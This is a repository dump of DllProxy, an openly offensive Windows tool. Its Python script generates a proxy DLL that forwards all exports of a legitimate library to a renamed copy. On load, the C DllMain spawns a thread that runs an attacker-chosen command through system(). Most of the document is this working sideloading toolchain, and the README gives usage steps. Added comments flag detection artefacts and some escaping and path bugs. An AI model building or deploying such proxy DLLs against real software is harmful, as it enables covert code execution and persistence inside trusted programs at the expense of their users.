├── .gitignore
├── DllProxy.sln
├── DllProxy
├── .gitignore
├── DllProxy.filters
├── Dllproxy.vcxproj
├── dllmain.c
└── dllmain.h
├── NormalDLL.dll
├── README.md
├── dllproxy.py
├── requirements.txt
└── templates.py
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.vspscc
94 | *.vssscc
95 | .builds
96 | *.pidb
97 | *.svclog
98 | *.scc
99 |
100 | # Chutzpah Test files
101 | _Chutzpah*
102 |
103 | # Visual C++ cache files
104 | ipch/
105 | *.aps
106 | *.ncb
107 | *.opendb
108 | *.opensdf
109 | *.sdf
110 | *.cachefile
111 | *.VC.db
112 | *.VC.VC.opendb
113 |
114 | # Visual Studio profiler
115 | *.psess
116 | *.vsp
117 | *.vspx
118 | *.sap
119 |
120 | # Visual Studio Trace Files
121 | *.e2e
122 |
123 | # TFS 2012 Local Workspace
124 | $tf/
125 |
126 | # Guidance Automation Toolkit
127 | *.gpState
128 |
129 | # ReSharper is a .NET coding add-in
130 | _ReSharper*/
131 | *.[Rr]e[Ss]harper
132 | *.DotSettings.user
133 |
134 | # TeamCity is a build add-in
135 | _TeamCity*
136 |
137 | # DotCover is a Code Coverage Tool
138 | *.dotCover
139 |
140 | # AxoCover is a Code Coverage Tool
141 | .axoCover/*
142 | !.axoCover/settings.json
143 |
144 | # Coverlet is a free, cross platform Code Coverage Tool
145 | coverage*.json
146 | coverage*.xml
147 | coverage*.info
148 |
149 | # Visual Studio code coverage results
150 | *.coverage
151 | *.coveragexml
152 |
153 | # NCrunch
154 | _NCrunch_*
155 | .*crunch*.local.xml
156 | nCrunchTemp_*
157 |
158 | # MightyMoose
159 | *.mm.*
160 | AutoTest.Net/
161 |
162 | # Web workbench (sass)
163 | .sass-cache/
164 |
165 | # Installshield output folder
166 | [Ee]xpress/
167 |
168 | # DocProject is a documentation generator add-in
169 | DocProject/buildhelp/
170 | DocProject/Help/*.HxT
171 | DocProject/Help/*.HxC
172 | DocProject/Help/*.hhc
173 | DocProject/Help/*.hhk
174 | DocProject/Help/*.hhp
175 | DocProject/Help/Html2
176 | DocProject/Help/html
177 |
178 | # Click-Once directory
179 | publish/
180 |
181 | # Publish Web Output
182 | *.[Pp]ublish.xml
183 | *.azurePubxml
184 | # Note: Comment the next line if you want to checkin your web deploy settings,
185 | # but database connection strings (with potential passwords) will be unencrypted
186 | *.pubxml
187 | *.publishproj
188 |
189 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
190 | # checkin your Azure Web App publish settings, but sensitive information contained
191 | # in these scripts will be unencrypted
192 | PublishScripts/
193 |
194 | # NuGet Packages
195 | *.nupkg
196 | # NuGet Symbol Packages
197 | *.snupkg
198 | # The packages folder can be ignored because of Package Restore
199 | **/[Pp]ackages/*
200 | # except build/, which is used as an MSBuild target.
201 | !**/[Pp]ackages/build/
202 | # Uncomment if necessary however generally it will be regenerated when needed
203 | #!**/[Pp]ackages/repositories.config
204 | # NuGet v3's project.json files produces more ignorable files
205 | *.nuget.props
206 | *.nuget.targets
207 |
208 | # Microsoft Azure Build Output
209 | csx/
210 | *.build.csdef
211 |
212 | # Microsoft Azure Emulator
213 | ecf/
214 | rcf/
215 |
216 | # Windows Store app package directories and files
217 | AppPackages/
218 | BundleArtifacts/
219 | Package.StoreAssociation.xml
220 | _pkginfo.txt
221 | *.appx
222 | *.appxbundle
223 | *.appxupload
224 |
225 | # Visual Studio cache files
226 | # files ending in .cache can be ignored
227 | *.[Cc]ache
228 | # but keep track of directories ending in .cache
229 | !?*.[Cc]ache/
230 |
231 | # Others
232 | ClientBin/
233 | ~$*
234 | *~
235 | *.dbmdl
236 | *.dbproj.schemaview
237 | *.jfm
238 | *.pfx
239 | *.publishsettings
240 | orleans.codegen.cs
241 |
242 | # Including strong name files can present a security risk
243 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
244 | #*.snk
245 |
246 | # Since there are multiple workflows, uncomment next line to ignore bower_components
247 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
248 | #bower_components/
249 |
250 | # RIA/Silverlight projects
251 | Generated_Code/
252 |
253 | # Backup & report files from converting an old project file
254 | # to a newer Visual Studio version. Backup files are not needed,
255 | # because we have git ;-)
256 | _UpgradeReport_Files/
257 | Backup*/
258 | UpgradeLog*.XML
259 | UpgradeLog*.htm
260 | ServiceFabricBackup/
261 | *.rptproj.bak
262 |
263 | # SQL Server files
264 | *.mdf
265 | *.ldf
266 | *.ndf
267 |
268 | # Business Intelligence projects
269 | *.rdl.data
270 | *.bim.layout
271 | *.bim_*.settings
272 | *.rptproj.rsuser
273 | *- [Bb]ackup.rdl
274 | *- [Bb]ackup ([0-9]).rdl
275 | *- [Bb]ackup ([0-9][0-9]).rdl
276 |
277 | # Microsoft Fakes
278 | FakesAssemblies/
279 |
280 | # GhostDoc plugin setting file
281 | *.GhostDoc.xml
282 |
283 | # Node.js Tools for Visual Studio
284 | .ntvs_analysis.dat
285 | node_modules/
286 |
287 | # Visual Studio 6 build log
288 | *.plg
289 |
290 | # Visual Studio 6 workspace options file
291 | *.opt
292 |
293 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
294 | *.vbw
295 |
296 | # Visual Studio LightSwitch build output
297 | **/*.HTMLClient/GeneratedArtifacts
298 | **/*.DesktopClient/GeneratedArtifacts
299 | **/*.DesktopClient/ModelManifest.xml
300 | **/*.Server/GeneratedArtifacts
301 | **/*.Server/ModelManifest.xml
302 | _Pvt_Extensions
303 |
304 | # Paket dependency manager
305 | .paket/paket.exe
306 | paket-files/
307 |
308 | # FAKE - F# Make
309 | .fake/
310 |
311 | # CodeRush personal settings
312 | .cr/personal
313 |
314 | # Python Tools for Visual Studio (PTVS)
315 | __pycache__/
316 | *.pyc
317 |
318 | # Cake - Uncomment if you are using it
319 | # tools/**
320 | # !tools/packages.config
321 |
322 | # Tabs Studio
323 | *.tss
324 |
325 | # Telerik's JustMock configuration file
326 | *.jmconfig
327 |
328 | # BizTalk build output
329 | *.btp.cs
330 | *.btm.cs
331 | *.odx.cs
332 | *.xsd.cs
333 |
334 | # OpenCover UI analysis results
335 | OpenCover/
336 |
337 | # Azure Stream Analytics local run output
338 | ASALocalRun/
339 |
340 | # MSBuild Binary and Structured Log
341 | *.binlog
342 |
343 | # NVidia Nsight GPU debugger configuration file
344 | *.nvuser
345 |
346 | # MFractors (Xamarin productivity tool) working folder
347 | .mfractor/
348 |
349 | # Local History for Visual Studio
350 | .localhistory/
351 |
352 | # BeatPulse healthcheck temp database
353 | healthchecksdb
354 |
355 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
356 | MigrationBackup/
357 |
358 | # Ionide (cross platform F# VS Code tools) working folder
359 | .ionide/
360 |
361 | # Fody - auto-generated XML schema
362 | FodyWeavers.xsd
363 |
364 | # Byte-compiled / optimized / DLL files
365 | __pycache__/
366 | *.py[cod]
367 | *$py.class
368 |
369 | # C extensions
370 | *.so
371 |
372 | # Distribution / packaging
373 | .Python
374 | build/
375 | develop-eggs/
376 | dist/
377 | downloads/
378 | eggs/
379 | .eggs/
380 | lib/
381 | lib64/
382 | parts/
383 | sdist/
384 | var/
385 | wheels/
386 | share/python-wheels/
387 | *.egg-info/
388 | .installed.cfg
389 | *.egg
390 | MANIFEST
391 |
392 | # PyInstaller
393 | # Usually these files are written by a python script from a template
394 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
395 | *.manifest
396 | *.spec
397 |
398 | # Installer logs
399 | pip-log.txt
400 | pip-delete-this-directory.txt
401 |
402 | # Unit test / coverage reports
403 | htmlcov/
404 | .tox/
405 | .nox/
406 | .coverage
407 | .coverage.*
408 | .cache
409 | nosetests.xml
410 | coverage.xml
411 | *.cover
412 | *.py,cover
413 | .hypothesis/
414 | .pytest_cache/
415 | cover/
416 |
417 | # Translations
418 | *.mo
419 | *.pot
420 |
421 | # Django stuff:
422 | *.log
423 | local_settings.py
424 | db.sqlite3
425 | db.sqlite3-journal
426 |
427 | # Flask stuff:
428 | instance/
429 | .webassets-cache
430 |
431 | # Scrapy stuff:
432 | .scrapy
433 |
434 | # Sphinx documentation
435 | docs/_build/
436 |
437 | # PyBuilder
438 | .pybuilder/
439 | target/
440 |
441 | # Jupyter Notebook
442 | .ipynb_checkpoints
443 |
444 | # IPython
445 | profile_default/
446 | ipython_config.py
447 |
448 | # pyenv
449 | # For a library or package, you might want to ignore these files since the code is
450 | # intended to run in multiple environments; otherwise, check them in:
451 | # .python-version
452 |
453 | # pipenv
454 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
455 | # However, in case of collaboration, if having platform-specific dependencies or dependencies
456 | # having no cross-platform support, pipenv may install dependencies that don't work, or not
457 | # install all needed dependencies.
458 | #Pipfile.lock
459 |
460 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
461 | __pypackages__/
462 |
463 | # Celery stuff
464 | celerybeat-schedule
465 | celerybeat.pid
466 |
467 | # SageMath parsed files
468 | *.sage.py
469 |
470 | # Environments
471 | .env
472 | .venv
473 | env/
474 | venv/
475 | ENV/
476 | env.bak/
477 | venv.bak/
478 |
479 | # Spyder project settings
480 | .spyderproject
481 | .spyproject
482 |
483 | # Rope project settings
484 | .ropeproject
485 |
486 | # mkdocs documentation
487 | /site
488 |
489 | # mypy
490 | .mypy_cache/
491 | .dmypy.json
492 | dmypy.json
493 |
494 | # Pyre type checker
495 | .pyre/
496 |
497 | # pytype static type analyzer
498 | .pytype/
499 |
500 | # Cython debug symbols
501 | cython_debug/
--------------------------------------------------------------------------------
/DllProxy.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30621.155
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DllProxy", "DllProxy\DllProxy.vcxproj", "{6991D7EB-4A6C-4251-86A5-039A008B3C68}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x64.ActiveCfg = Debug|x64
17 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x64.Build.0 = Debug|x64
18 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x86.ActiveCfg = Debug|Win32
19 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x86.Build.0 = Debug|Win32
20 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x64.ActiveCfg = Release|x64
21 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x64.Build.0 = Release|x64
22 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x86.ActiveCfg = Release|Win32
23 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8A19F473-B984-4265-87B7-A0B779380C47}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/DllProxy/.gitignore:
--------------------------------------------------------------------------------
1 | user.c
2 | user.h
3 | library.def
--------------------------------------------------------------------------------
/DllProxy/DllProxy.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 |
31 |
32 | Header Files
33 |
34 |
35 | Header Files
36 |
37 |
38 |
--------------------------------------------------------------------------------
/DllProxy/Dllproxy.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {6991d7eb-4a6c-4251-86a5-039a008b3c68}
25 | DllProxy
26 | 10.0.19041.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 | DllProxy
76 |
77 |
78 | false
79 | DllProxy
80 |
81 |
82 | true
83 | DllProxy
84 |
85 |
86 | false
87 | DllProxy
88 | $(VC_ExecutablePath_x64);$(CommonExecutablePath)
89 |
90 |
91 |
92 | Level3
93 | true
94 | WIN32;_DEBUG;DllProxy_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
95 | true
96 | NotUsing
97 | pch.h
98 |
99 |
100 | Windows
101 | true
102 | false
103 |
104 |
105 |
106 |
107 | Level3
108 | true
109 | true
110 | true
111 | WIN32;NDEBUG;DllProxy_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 | NotUsing
114 | pch.h
115 |
116 |
117 | Windows
118 | true
119 | true
120 | true
121 | false
122 |
123 |
124 |
125 |
126 | Level3
127 | true
128 | _DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
129 | true
130 | NotUsing
131 | pch.h
132 | MultiThreadedDLL
133 |
134 |
135 | Windows
136 | true
137 | false
138 |
139 |
140 |
141 |
142 |
143 |
144 | Level3
145 | true
146 | true
147 | true
148 | NDEBUG;DllProxy_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
149 | true
150 | NotUsing
151 |
152 |
153 |
154 |
155 |
156 | Windows
157 | false
158 | true
159 | true
160 | false
161 |
162 |
163 | $(OutDir)$(TargetName)$(TargetExt)
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
--------------------------------------------------------------------------------
/DllProxy/dllmain.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | #include "dllmain.h"
6 |
7 | #define _CRT_SECURE_NO_DEPRECATE
8 | #pragma warning (disable : 4996)
9 |
10 |
/*
 * Thread start routine used by DllMain.
 *
 * Passes MALICIOUS_CMD (a string macro supplied by dllmain.h) to the C
 * runtime's system() and then ends the thread with exit code 0. The
 * thread argument is not used and the result of system() is discarded.
 *
 * Defender note: system() hands the string to the command interpreter, so
 * the command appears as a child process of whichever process loaded this
 * DLL.
 */
DWORD WINAPI DoMagic(LPVOID lpParameter)
{
    const DWORD threadExitCode = 0;

    (void)lpParameter; /* unused */
    system(MALICIOUS_CMD);

    return threadExitCode;
}
16 |
17 |
/*
 * DLL entry point.
 *
 * For notification code 1 (DLL_PROCESS_ATTACH in the Windows SDK) it starts
 * DoMagic on a new thread and immediately closes this module's handle to
 * that thread. Every notification, including that one, returns 1.
 *
 * hModule and lpReserved are not used.
 *
 * NOTE(review): the CreateThread result is handed to CloseHandle without a
 * NULL check, so a failed thread creation becomes CloseHandle(NULL).
 *
 * Defender note: the visible pattern is a thread created while the module
 * is being loaded, with its start routine inside this same module.
 */
int DllMain(void* hModule, int ul_reason_for_call, void* lpReserved)
{
    HANDLE workerThread;

    /* Anything other than process attach: nothing to do. */
    if (ul_reason_for_call != 1) {
        return 1;
    }

    workerThread = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
    CloseHandle(workerThread);

    return 1;
}
--------------------------------------------------------------------------------
/NormalDLL.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Iansus/DllProxy/22602270ad62c004c4a6e80b09acf0aacbc8258f/NormalDLL.dll
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DllProxy
2 |
3 | Proxy your dll exports and add some spicy content at the same time!
4 | The new version relies on forwarded exports rather than loading the library at runtime; it is heavily inspired by [SharpDllProxy](https://github.com/Flangvik/SharpDllProxy)
5 |
6 | # Install
7 |
8 | ```batch
9 | > python3 -m virtualenv venv
10 | > venv\scripts\activate
11 | > pip3 install -r requirements.txt
12 | ```
13 |
14 |
15 | # Use
16 |
17 | ```batch
18 | > rundll32.exe NormalDLL.dll,test
19 | > rundll32.exe NormalDLL.dll,#2
20 |
21 | > python3 dllproxy.py -m calc.exe NormalDLL.dll
22 |
23 | > rundll32.exe dist\NormalDLL.dll,test
24 | > rundll32.exe dist\NormalDLL.dll,#2
25 | ```
--------------------------------------------------------------------------------
/dllproxy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | import argparse
4 | import logging
5 | import os
6 | import pereader
7 | import random
8 | import shutil
9 | import templates
10 |
# Logging config: every record is rendered as "[time] name level message".
# The format string starts with '\r', so each record begins with a carriage
# return before the timestamp.
logging.basicConfig(format = '\r[%(asctime)s] %(name)-20s %(levelname)-9s %(message)s')
# getLogger('') returns the root logger; its level is set later from --verbose.
logger = logging.getLogger('')
14 |
def randstr(n):
    """Return a string of *n* random ASCII letters (a-z, A-Z).

    Characters come from the `random` module, which is not a
    cryptographically secure generator. Within this file the result is only
    used as a placeholder name for exports that have no name, so
    unpredictability is not relied upon.
    """
    alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    picked = []
    for _ in range(n):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
18 |
19 |
def genVSProject(newName, origName, maliciousCmd):
    """Write DllProxy\\dllmain.h for the DLL at *origName* and return its bitness.

    The input file is parsed with pereader. For each entry of its export
    table one `#pragma comment(linker, "/export:...")` line is produced that
    forwards the export, at the same ordinal, to the module named by
    *newName* with its last four characters removed. Exports without a name
    get a random 8-letter name and are forwarded by ordinal (`#<ordinal>`).

    Args:
        newName: file name the original DLL will carry next to the proxy;
            the last four characters are dropped, which assumes a
            four-character extension such as ".dll".
        origName: path of the DLL whose exports are read.
        maliciousCmd: text placed inside the MALICIOUS_CMD string literal of
            the header. It is inserted as given; any escaping has to be done
            by the caller.

    Returns:
        64 when the optional-header magic equals
        pereader.NT_OPTIONAL_HDR64_MAGIC, otherwise 32.

    Defender note: a DLL built from this header has an export table made of
    forwarders that all point at one sibling module, which is a property
    that can be checked statically.
    """
    pe_image = pereader.PE(origName)
    forward_target = newName[:-4]

    if pe_image.OPTIONAL_HEADER.Magic == pereader.NT_OPTIONAL_HDR64_MAGIC:
        bitness = 64
    else:
        bitness = 32
    logger.info('input DLL is %d-bits' % bitness)

    # Keyed by the exported name so that a generated placeholder can never
    # collide with a name that has already been emitted.
    export_pragmas = {}
    for export in pe_image.directory_entry_export.symbols.symbols:
        if export.name != '':
            export.origname = export.name
        else:
            # Ordinal-only export: invent a unique name and forward by ordinal.
            while export.name == '' or export.name in export_pragmas:
                export.name = randstr(8)
            export.origname = f'#{export.ordinal}'

        export_pragmas[export.name] = (
            f'#pragma comment(linker, "/export:{export.name}='
            f'{forward_target}.{export.origname},@{export.ordinal}")'
        )

    header_text = templates.DLLMAIN_H % {
        'MALICIOUS_CMD': maliciousCmd,
        'PRAGMA_COMMENTS': '\n'.join(export_pragmas.values()),
    }
    with open('DllProxy\\dllmain.h', 'w') as hFile:
        hFile.write(header_text)

    return bitness
46 |
47 |
if __name__ == '__main__':

    # Command line: optional command string, verbosity switch, input DLL path.
    parser = argparse.ArgumentParser()
    parser.add_argument('--malicious-cmd', '-m', dest='malicious_cmd', required=False, default='C:\\Windows\\System32\\calc.exe')
    parser.add_argument('--verbose', '-v', action='store_true', default=False)
    parser.add_argument('DLL')
    args = parser.parse_args()

    logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
    logger.info('welcome to DLLProxy!')

    origDll = args.DLL
    # The original DLL is shipped under its own base name prefixed with "p-".
    newDll = 'p-' + os.path.basename(origDll)

    # The command ends up inside a C string literal in dllmain.h, so
    # backslashes are doubled first.
    # NOTE(review): the second replace changes nothing, because '\"' is the
    # same one-character string as '"'. A double quote in the argument
    # therefore reaches the generated #define unescaped and ends the C
    # string literal early.
    malicious_cmd = args.malicious_cmd.replace('\\', '\\\\').replace('"', '\"')

    bitness = genVSProject(newDll, origDll, malicious_cmd)
    platform = 'x86' if bitness != 64 else 'x64'

    # The build itself is manual; wait until the operator confirms it.
    prompt_parts = [
        'Open solution file within Visual Studio and build the solution:\n',
        ' * Configuration: Release\n',
        f' * Platform: {platform}\n\n',
        'Press [ENTER] after successful build\n',
    ]
    input(''.join(prompt_parts))

    OUTPUT_DIR = 'dist'
    VS_DLLNAME = 'DllProxy.dll'
    if bitness == 32:
        VS_BUILD_DIR = 'Release'
    else:
        VS_BUILD_DIR = os.path.join('x64', 'Release')

    if not os.path.isdir(OUTPUT_DIR):
        os.mkdir(OUTPUT_DIR)

    built_proxy_dll = os.path.join(VS_BUILD_DIR, VS_DLLNAME)
    # NOTE(review): origDll is joined as given, not as a base name. With an
    # absolute path os.path.join discards OUTPUT_DIR, so the second copy
    # below would be written over the input file instead of into dist/.
    dist_proxy_dll = os.path.join(OUTPUT_DIR, origDll)
    dist_proxied_dll = os.path.join(OUTPUT_DIR, newDll)

    # Resulting layout: dist/p-<name> is the untouched original and
    # dist/<name> is the freshly built DLL. Defender note: a DLL sitting
    # next to a "p-"-prefixed copy of itself is the on-disk artefact of this
    # script.
    shutil.copy(origDll, dist_proxied_dll)
    shutil.copy(built_proxy_dll, dist_proxy_dll)
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pereader
--------------------------------------------------------------------------------
/templates.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
# Template for the generated DllProxy\dllmain.h header.
# dllproxy.genVSProject fills it with %-formatting:
#   MALICIOUS_CMD   -> text placed between the double quotes of the #define
#   PRAGMA_COMMENTS -> newline-joined '#pragma comment(linker, ...)' lines
# NOTE(review): both values are inserted verbatim. Nothing in this template
# escapes quotes or newlines, so the caller decides what C source results.
DLLMAIN_H = '''#ifndef DLLMAIN_H
#define DLLMAIN_H

#define MALICIOUS_CMD "%(MALICIOUS_CMD)s"
%(PRAGMA_COMMENTS)s

#endif'''
--------------------------------------------------------------------------------